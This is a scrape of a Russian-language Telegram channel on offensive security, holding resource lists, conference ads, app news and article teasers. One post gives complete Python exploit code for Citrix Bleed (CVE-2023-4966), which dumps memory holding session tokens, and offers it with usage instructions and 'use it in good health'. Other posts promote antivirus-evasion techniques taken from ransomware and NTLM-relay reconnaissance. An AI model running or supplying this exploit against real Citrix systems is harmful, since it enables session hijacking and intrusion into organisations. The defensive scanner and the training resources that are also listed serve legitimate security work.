Всем спасибо, что были со мной эти 2 года. Всем новым, кто только присоединился предлагаю позвать своих коллег сюда. Гарантирую, будет интересно 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥38👍6
#подборка #awesome
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
NetworkChuck
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Codeby Games
Standoff КиберПолигон
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
LiveOverflow
just a wannabe hacker... making videos about various IT security topics and participating in hacking competitions.
-=[ ❤️ Support me ]=-
Patreon per Video: https://www.patreon.com/join/liveoverflow
YouTube Membership per Month: https://www.youtube.com/channel/UClcE…
-=[ ❤️ Support me ]=-
Patreon per Video: https://www.patreon.com/join/liveoverflow
YouTube Membership per Month: https://www.youtube.com/channel/UClcE…
👍52❤🔥13❤12
Обращение к менеджерам и коллегам администраторам других телеграм каналов.
Коллеги, давайте не воровать друг у друга посты, либо оставляйте какое-то указание источника. Я стараюсь не конфликтовать в медиа-сфере и решать вопросы на словах.
Спасибо тем подписчикам, кто сообщил о сложившейся ситуации 🤍
Коллеги, давайте не воровать друг у друга посты, либо оставляйте какое-то указание источника. Я стараюсь не конфликтовать в медиа-сфере и решать вопросы на словах.
Спасибо тем подписчикам, кто сообщил о сложившейся ситуации 🤍
❤23👍5🌚1🎄1
#windows #redteam
Главные функции:
net user или user management приложений Windows (например, netapi32::netuseradd).Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16🆒2❤1
Forwarded from Standoff 365
🔎 Хотите тоже оказаться в поисковой выдаче Яндекса по запросу «багбаунти»?
Есть простой способ: выступите 24–25 ноября на митапе Standoff Talks, где соберутся элита российского багбаунти и легенды практической безопасности.
🔥 Специально для вас мы решили увеличить количество выступлений и по этому поводу продлеваем call for papers до 27 октября.
Ждем докладов о пентесте и red team, багбаунти, участии в Standoff, онлайн-киберучениях, OSINT или на любую другую интересную тему в сфере практической кибербезопасности.
Все подробности и форма подачи заявки — здесь: https://cfp.standoff365.com/talks/cfp
Есть простой способ: выступите 24–25 ноября на митапе Standoff Talks, где соберутся элита российского багбаунти и легенды практической безопасности.
Ждем докладов о пентесте и red team, багбаунти, участии в Standoff, онлайн-киберучениях, OSINT или на любую другую интересную тему в сфере практической кибербезопасности.
Все подробности и форма подачи заявки — здесь: https://cfp.standoff365.com/talks/cfp
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉7☃1🌚1
Похек
image_2023-10-22_16-04-28.png
76.4 KB
вы уже видели шикарную обнову тг?
❤10👍4🔥2❤🔥1
Forwarded from Код Дурова
В бета-версии 4.10.4 Beta приложения Telegram Desktop у администраторов появилась возможность работать со статистикой каналов и групп.
Добавлены и другие важные нововведения:
— Например, можно быстро менять настройки пересылки по нажатию правой кнопки мыши на панель над полем ввода.
— Теперь есть визуально красивые блоки с кодом с подсветкой синтаксиса, их можно копировать по щелчку на заголовки блоков.
— Блок с моноширинным текстом и с подсветкой кода на выбранном языке программирования можно копировать при помощи синтаксиса ```language.
— Сочетание клавиш Ctrl+Space позволяет открывать меню проверки орфографии.
@d_code
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍1
Forwarded from Just Security
Мало кто знает, но в Awillix люди почти не попадают с улицы или «по объявлению», у всех есть история личного знакомства или его интересных обстоятельств. Так, например, Сережа aka @poxek подошел к нам на форуме после выступления с рядом интересных вопросов по теме.
«Такой молодой, а такой прокаченный парень» — подумали мы. Запомнили. А через время позвали в команду.
Его пример другим наука, как с помощью проактивности и упорства нестись по карьерной лестнице, обгоняя сверстников, получать разные бенефиты и полезные знакомства и успевать вести дюжину собственных проектов. Об этом он и дал интервью, спешите вдохновляться!
«Такой молодой, а такой прокаченный парень» — подумали мы. Запомнили. А через время позвали в команду.
Его пример другим наука, как с помощью проактивности и упорства нестись по карьерной лестнице, обгоняя сверстников, получать разные бенефиты и полезные знакомства и успевать вести дюжину собственных проектов. Об этом он и дал интервью, спешите вдохновляться!
🔥22❤🔥6👍4🥰3❤1🫡1💘1
This media is not supported in your browser
VIEW IN TELEGRAM
#AVbypass #xakep
В этой статье мы с тобой напишем полноценную пермутирующую реализацию техники API Hashing, что позволит раз и навсегда скрыть импорты от глаз антивируса. Впервые технику API Hashing я увидел в вирусе‑шифровальщике Revil, проблема лишь в том, что хеши от функций были вписаны в код, а это позволяет легко создавать сигнатуры. Давай сделаем так, чтобы все данные генерировались на лету, тогда у антивируса не будет шансов!
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8👍5👀1
This media is not supported in your browser
VIEW IN TELEGRAM
#bloodhound #xakep
Прежде чем применять технику NTLM Relay, необходимо собрать информацию об исследуемом объекте и выбрать первоочередные цели. Но как это сделать, если атакуемая сеть насчитывает многие десятки или сотни узлов? На помощь придет очень полезный и удобный инструмент — BloodHound!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥6
Forwarded from Волосатый бублик
#cisco #cve #webshell #scanner #blueteam
[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]
Author: Shadow0ps
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]
Webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273.Important! This is not a POC for exploitation. This is a OSINT/Blue Team/Research tool.
Author: Shadow0ps
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Эксплойт для Citrix Bleed: Leaking Session Tokens
CVE-2023-4966
Пользуйтесь на здоровье😉
Exploit:
Использование:
💻 Github
➡️ Исследование
📹 YouTube PoC
🌚 @poxek
CVE-2023-4966
Пользуйтесь на здоровье
Exploit:
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()
if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
sys.exit(0)
hostname = args.target
if __name__ == "__main__":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
Использование:
python exploit.py --target TARGET
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤1
Forwarded from Standoff 365
This media is not supported in your browser
VIEW IN TELEGRAM
Все просто: нужно быть матерым спецом по ИБ (уверены, в нашем канале только такие) и оставить заявку на сайте.
А 24–25 ноября встретиться в Кибердоме в рамках Moscow Hacking Week, чтобы прокачать свои скилы в багхантинге и пентесте, да и в целом круто провести время.
Не забудьте рассказать о себе в заявке и поторопитесь — количество мест ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🆒1
Похек
This media is not supported in your browser
VIEW IN TELEGRAM
Компания Microsoft анонсировала, что в будущем NTLM (New Technology LAN Manager) будет отключен в Windows 11, поскольку компания переходит на альтернативные методы аутентификации и повышения безопасности. Теперь основной упор будет сделан на усиление протокола Kerberos.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥13
Мероприятие для тех, кто хочет попасть в кибербез, но не знает, с чего начать
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤2
Место для общения и обмена опытом профи и энтузиастов ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
This media is not supported in your browser
VIEW IN TELEGRAM
Apple WebKit Arbitrary Code Execution
Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.
Please open Telegram to view this post
VIEW IN TELEGRAM
😎9⚡2👍2💔2